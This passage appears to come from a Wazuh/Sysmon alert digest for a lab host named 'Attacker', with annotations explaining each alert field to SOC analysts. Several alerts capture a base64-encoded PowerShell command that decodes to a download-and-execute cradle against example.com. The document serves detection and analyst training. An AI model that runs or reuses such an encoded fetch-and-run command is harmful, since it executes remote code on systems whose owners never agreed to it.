Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  118
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535347.2719232
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:45.1744811Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350392
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:44.004 ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} ProcessId: 9224 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} ParentProcessId: 9948 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:44.004
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c170-680a-e10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c16d-680a-df0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9948
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:47.451+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:47.451+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  122
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535347.2727295
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:45.3706619Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350393
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:45.357 ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} ProcessId: 9224 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2wwl0blf.ude.ps1 CreationUtcTime: 2025-04-24 22:55:45.355 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:45.357
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c170-680a-e10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2wwl0blf.ude.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:45.355
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:52.666+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:52.666+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  119
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535352.2730060
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:49.9714983Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350420
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:46.414 ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} ProcessId: 8356 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} ParentProcessId: 9224 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:46.414
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c172-680a-e30c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c170-680a-e10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:52.720+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:52.720+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  123
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535352.2738123
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:50.2371884Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350424
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:50.233 ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} ProcessId: 8356 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_keqzo4et.k23.ps1 CreationUtcTime: 2025-04-24 22:55:50.233 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:50.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c172-680a-e30c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_keqzo4et.k23.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:50.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:56.768+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:56.768+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  120
